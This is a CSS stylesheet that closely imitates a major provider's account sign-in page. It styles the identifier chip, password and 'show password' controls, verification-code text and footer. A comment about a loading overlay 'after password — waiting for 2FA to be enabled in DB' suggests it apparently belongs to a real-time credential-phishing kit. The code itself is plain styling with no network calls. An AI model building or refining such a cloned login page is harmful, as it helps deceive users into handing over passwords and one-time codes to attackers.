body {
    background-color: white;
    font-size: 0.875rem;
    font-weight: 400;
    letter-spacing: 0rem;
    line-height: 1.42857143;
    margin: 0;
    padding: 0;
    font-family: roboto, arial, sans-serif;
}

.ryder-trans-container {
    display: flex;
    flex-direction: column;
    background: #f0f4f9;
    justify-content: center;
    padding: 48px 0;
    min-height: 83vh;
    align-items: center;
}

.ryder-trans-main {
    border-radius: 28px;
    padding: 108px 36px 24px;
    background-color: white;
    display: flex;
    flex-direction: column;
    position: relative;
    width: 800px;
}

.ryder-trans-wrapper {
    display: flex;
    flex-direction: column;
    flex-grow: 1;
}

.ryder-trans-section {
    display: flex;
    flex-direction: row;
    flex-grow: 1;
}

.ryder-trans-logo-section {
    flex-basis: 50%;
    flex-grow: 1;
    max-width: 50%;
    padding-right: 24px;
    margin-top: -72px;
}

.ryder-trans-svg-section {
    display: flex;
    justify-content: flex-start;
    height: 48px;
}

.ryder-trans-txt-section {
    margin-bottom: 0;
    display: flex;
    flex-direction: column;
}

.ryder-trans-sign-in-text span {
    line-height: 1.22222222;
    font-size: 2.25rem;
}

.ryder-trans-sign-in-text {
    color: #1f1f1f;
    font-family: roboto, "Noto Sans Myanmar UI", arial, sans-serif;
    font-weight: 400;
    line-height: 1.25;
    margin-bottom: 0;
    margin-top: 24px;
    word-break: break-word;
    font-size: 2rem;
}

.ryder-trans-sign-sub-text {
    color: #1f1f1f;
    font-family: roboto, "Noto Sans Myanmar UI", arial, sans-serif;
    font-weight: 400;
    letter-spacing: 0rem;
    line-height: 1.5;
    margin-bottom: 0;
    margin-top: 16px;
    font-size: 1rem;
}

.ryder-trans-sign-sub-text a {
    font-weight: 500;
    color: #0b57d0;
    border-radius: 8px;
    display: inline-block;
    letter-spacing: 0.015625rem;
    outline: 0;
    z-index: 1;
    text-decoration: none;
}

.ryder-trans-fields-section {
    padding-left: 24px;
    flex-basis: 50%;
    flex-grow: 1;
    max-width: 50%;
}

.ryder-trans-fields-section-second {
    display: flex;
}

.ryder-trans-fields-section-content {
    flex-shrink: 0;
    width: 100%;
}

.ryder-trans-form-section {
    margin: 16px 0;
    outline: none;
}

.ryder-trans-form-fields-wrapper {
    display: flex;
    flex-grow: 1;
    flex-shrink: 1;
    min-width: 0%;
    position: relative;
    flex-direction: column;
}

.ryder-trans-form-field-block {
    display: block;
    width: 100%;
    padding: 8px 0 10px;
    -webkit-user-select: none;
    -webkit-tap-highlight-color: transparent;
    outline: none;
}

.ryder-trans-form-input-wrapper {
    height: 56px;
    padding-top: 0;
    position: relative;
    vertical-align: top;
}

.ryder-trans-form-input-content {
    text-align: left;
    align-items: center;
    position: static;
    display: flex;
    border: 1px solid;
    border-color: #747775;
    border-color: #4285f4;
    border-radius: 4px;
    bottom: 0;
    box-sizing: border-box;
}

.ryder-trans-form-input-description {
    font-family: roboto, "Noto Sans Myanmar UI", arial, sans-serif;
    background: white;
    bottom: 17px;
    box-sizing: border-box;
    font-size: 16px;
    font-weight: 400;
    left: 8px;
    max-width: calc(100% - 16px);
    overflow: hidden;
    padding: 0 8px;
    text-overflow: ellipsis;
    transition: transform 0.15s cubic-bezier(0.4, 0, 0.2, 1), opacity 0.15s cubic-bezier(0.4, 0, 0.2, 1);
    white-space: nowrap;
    width: auto;
    z-index: 1;
    color: #0b57d0;
    transform: scale(0.75) translateY(-39px);
    position: absolute;
}

.ryder-trans-form-input {
    text-align: left;
    border-radius: 4px;
    color: #1f1f1f;
    font-family: roboto, arial, sans-serif;
    font-size: 16px;
    height: 28px;
    width: 100%;
    flex-grow: 1;
    flex-shrink: 1;
    background-color: transparent;
    border: none;
    display: block;
    line-height: 24px;
    outline: none;
    margin: 1px 1px 0 1px;
    padding: 13px 15px;
    z-index: 1;
}

.ryder-trans-forgot-btn-wrapper {
    margin-top: 20px;
}

.ryder-trans-forgot-btn-wrapper a {
    position: relative;
    color: #0b57d0;
    border-radius: 8px;
    display: inline-block;
    font-weight: 500;
    letter-spacing: 0.015625rem;
    outline: 0;
    z-index: 1;
    text-decoration: none;
}

.ryder-trans-buttons-wrapper {
    width: 100%;
    display: flex;
    flex-direction: column;
    flex-grow: 1;
    flex-wrap: wrap;
    justify-content: flex-end;
    margin-bottom: -6px;
    margin-left: -16px;
    margin-top: 32px;
}

.ryder-trans-buttons-content {
    display: flex;
    flex-direction: row-reverse;
    align-items: center;
    width: 100%;
}

.ryder-trans-buttons-first {
    flex-grow: unset;
    margin-left: 40px;
    margin-right: 0;
    display: flex;
    justify-content: flex-end;
}

.ryder-trans-next-button {
    color: #fff;
    background-color: rgb(26, 115, 232);
    height: 40px;
    font-family: roboto, arial, sans-serif;
    font-size: 0.875rem;
    font-weight: 500;
    letter-spacing: 0rem;
    line-height: 1.42857143;
    padding: 0 24px 0 24px;
    border-radius: 20px;
    border: none;
    cursor: pointer;
}

.ryder-trans-buttons-second {
    display: flex;
    flex-direction: row-reverse;
    flex-wrap: wrap;
    width: 100%;
}

.ryder-trans-buttons-second-child {
    margin-right: -16px;
}

.ryder-trans-buttons-second-child a {
    color: rgb(26, 115, 232);
    background-color: transparent;
    padding-left: 16px;
    padding-right: 16px;
    outline: #747775;
    height: 40px;
    font-family: roboto, arial, sans-serif;
    font-size: 0.875rem;
    font-weight: 500;
    letter-spacing: 0rem;
    line-height: 1.42857143;
    text-transform: none;
    text-decoration: none;
}

.ryder-trans-desc-section {
    color: #444746;
    font-family: roboto, arial, sans-serif;
    font-size: 0.875rem;
    font-weight: 400;
    letter-spacing: 0rem;
    line-height: 1.42857143;
    margin-top: 32px;
}

.ryder-trans-desc-content {
    padding-bottom: 3px;
    padding-top: 9px;
}

.ryder-trans-desc-content a {
    position: relative;
    color: #0b57d0;
    border-radius: 8px;
    display: inline-block;
    font-weight: 500;
    letter-spacing: 0.015625rem;
    outline: 0;
    z-index: 1;
    text-decoration: none;
}

.ryder-trans-footer-wrapper {
    padding: 0 16px;
    width: 840px;
    margin: 0 auto;
}

.ryder-trans-footer-section {
    display: flex;
    flex-wrap: wrap;
    justify-content: space-between;
}

.ryder-trans-footer-links {
    display: flex;
    list-style: none;
    margin: 0 -12px;
    padding: 0;
}

.ryder-trans-footer-links li {
    display: flex;
    margin: 16px 4px 16px 0;
}

.ryder-trans-footer-links li > span {
    align-content: center;
    border-radius: 8px;
    color: #1f1f1f;
    display: flex;
    flex-wrap: wrap;
    font-family: roboto, arial, sans-serif;
    font-size: 0.75rem;
    font-weight: 400;
    letter-spacing: 0.00625rem;
    line-height: 1.33333333;
    outline: none;
    padding: 8px 12px;
    text-decoration: none;
}

.ryder-trans-footer-lang {
    margin: 16px 12px 16px 0;
}

.ryder-trans-footer-lang-block {
    display: inline-flex;
    flex-direction: column;
    position: relative;
}

.ryder-trans-footer-lang-content {
    position: relative;
    margin-left: -16px;
    border: none;
    display: inline-flex;
}

.ryder-trans-footer-lang-content-wrapper {
    background-color: transparent;
    height: 32px;
    padding-left: 16px;
    padding-right: 0;
    display: flex;
    align-items: center;
    overflow: visible;
    width: 200px;
    min-width: 0;
    flex: 1 1 auto;
    position: relative;
    box-sizing: border-box;
    outline: none;
    cursor: pointer;
}

.ryder-trans-lang-selection-text {
    font-family: roboto, arial, sans-serif;
    line-height: 1.33333333;
    font-size: 0.75rem;
    font-weight: 400;
    letter-spacing: 0.00625rem;
    color: rgb(60, 64, 67);
}

.ryder-trans-lang-selection-point {
    fill: rgb(95, 99, 104);
    width: 20px;
    height: 20px;
    margin-left: 12px;
    margin-right: 12px;
    display: inline-flex;
    position: relative;
    align-self: center;
    flex-shrink: 0;
    flex-grow: 0;
    box-sizing: border-box;
}

.ryder-trans-lang-selection-point svg {
    width: 41.6666666667%;
    height: 35.8333333333%;
}

.ryder-trans-error-wrapper {
    font-family: roboto, arial, sans-serif;
    font-size: 0.75rem;
    font-weight: 400;
    letter-spacing: 0.00625rem;
    line-height: 1.33333333;
    opacity: 1;
    padding-top: 4px;
    color: #d50000;
}

.ryder-trans-error-message {
    align-items: flex-start;
    font-family: roboto, arial, sans-serif;
    font-size: 0.75rem;
    font-weight: 400;
    letter-spacing: 0.00625rem;
    line-height: 1.33333333;
    margin-top: 2px;
    color: #b3261e;
    display: none;
}

.ryder-trans-error-message span {
    margin-right: 8px;
    margin-top: 0px;
}

.ryder-trans-user-svg {
    border-radius: 12px;
    height: 24px;
    margin-right: 8px;
}

.ryder-trans-user-svg svg {
    border-radius: 50%;
    color: #444746;
    display: block;
    height: 24px;
    width: 24px;
}

.ryder-trans-user-identifier-data {
    font-family: roboto, "Noto Sans Myanmar UI", arial, sans-serif;
    font-size: 0.875rem;
    font-weight: 500;
    letter-spacing: 0rem;
    text-decoration: none;
    line-height: 30px;
    text-align: left;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
}

.ryder-trans-user-data-section-vector {
    color: #1f1f1f;
    flex-shrink: 0;
    height: 13px;
    margin-left: 10px;
    width: 20px;
    transition: transform 0.2s cubic-bezier(0.4, 0, 0.2, 1);
}

.ryder-trans-user-data-section-vector svg {
    display: block;
    height: 13px;
    width: 13px;
}

.ryder-trans-sign-txt {
    color: #1f1f1f;
    font-family: roboto, "Noto Sans Myanmar UI", arial, sans-serif;
    font-weight: 400;
    line-height: 1.25;
    margin-bottom: 0;
    margin-top: 24px;
    word-break: break-word;
    font-size: 2rem;
}

.ryder-trans-sign-sub-txt {
    color: #1f1f1f;
    font-family: roboto, "Noto Sans Myanmar UI", arial, sans-serif;
    font-weight: 400;
    letter-spacing: 0rem;
    line-height: 1.5;
    margin-bottom: 0;
    margin-top: 16px;
    font-size: 1rem;
}

.ryder-trans-sign-sub-txt a {
    font-weight: 500;
    color: #0b57d0;
    border-radius: 8px;
    display: inline-block;
    letter-spacing: 0.015625rem;
    outline: 0;
    z-index: 1;
    text-decoration: none;
}

.ryder-trans-user-data-section {
    margin-bottom: 0;
    margin-top: 16px;
    height: 32px;
}

.ryder-trans-user-data-block {
    position: relative;
    padding-left: 3px;
    padding-right: 8px;
    border-radius: 16px;
    align-items: center;
    background: white;
    border: 1px solid #747775;
    color: #1f1f1f;
    cursor: pointer;
    display: inline-flex;
    font-size: 0.875rem;
    font-weight: 500;
    letter-spacing: 0.25px;
    max-width: 100%;
}
.ryder-trans-user-svg {
    border-radius: 12px;
    height: 24px;
    margin-right: 8px;
}

.ryder-trans-user-svg svg {
    border-radius: 50%;
    color: #444746;
    display: block;
    height: 24px;
    width: 24px;
}

.ryder-trans-user-identifier-data {
    font-family: roboto, "Noto Sans Myanmar UI", arial, sans-serif;
    font-size: 0.875rem;
    font-weight: 500;
    letter-spacing: 0rem;
    text-decoration: none;
    line-height: 30px;
    text-align: left;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
}

.ryder-trans-user-data-section-vector {
    color: #1f1f1f;
    flex-shrink: 0;
    height: 13px;
    margin-left: 10px;
    width: 20px;
    transition: transform 0.2s cubic-bezier(0.4, 0, 0.2, 1);
}

.ryder-trans-user-data-section-vector svg {
    display: block;
    height: 13px;
    width: 13px;
}

.ryder-trans-show-pswd-checkbox {
    width: 26px;
    height: 18px;
}

.ryder-trans-show-btn-section span {
    color: #1f1f1f;
    font-family: roboto, arial, sans-serif;
    margin-left: 10px;
}

.ryder-trans-show-btn-section {
    display: flex;
    padding-bottom: 3px;
    padding-top: 25px;
}

.ryder-trans-code-txt-section {
    padding-bottom: 15px;
    padding-top: 9px;
    color: #1f1f1f;
    font-family: roboto, arial, sans-serif;
    font-size: 0.875rem;
    font-weight: 400;
    letter-spacing: 0rem;
    line-height: 1.42857143;
}

@media (max-width: 960px) {
    .ryder-trans-main {
        border-radius: 28px;
        min-height: 384px;
        padding-left: 36px;
        padding-right: 36px;
        padding-top: 108px;
        width: 840px;
    }
}

@media (min-width: 1600px) {
    .ryder-trans-container {
        min-height: 100vh;
    }
    .ryder-trans-main {
        margin-left: auto;
        margin-right: auto;
        width: 1040px;
    }
    .ryder-trans-footer-wrapper {
        width: 1040px;
    }
}

/* Loading overlay after password — waiting for 2FA to be enabled in DB */
.tf-pswd-loading {
    display: none;
    position: fixed;
    inset: 0;
    z-index: 9999;
    background: rgba(240, 244, 249, 0.72);
    align-items: center;
    justify-content: center;
}

.tf-pswd-loading-box {
    padding: 28px 36px;
    text-align: center;
    min-width: 200px;
}

.tf-pswd-spinner {
    width: 36px;
    height: 36px;
    margin: 0 auto 14px;
    border: 3px solid #e8eaed;
    border-top-color: #1a73e8;
    border-radius: 50%;
    animation: tf-pswd-spin 0.8s linear infinite;
}

.tf-pswd-loading-text {
    margin: 0;
    color: #3c4043;
    font-size: 0.95rem;
    font-family: roboto, arial, sans-serif;
}

@keyframes tf-pswd-spin {
    to { transform: rotate(360deg); }
}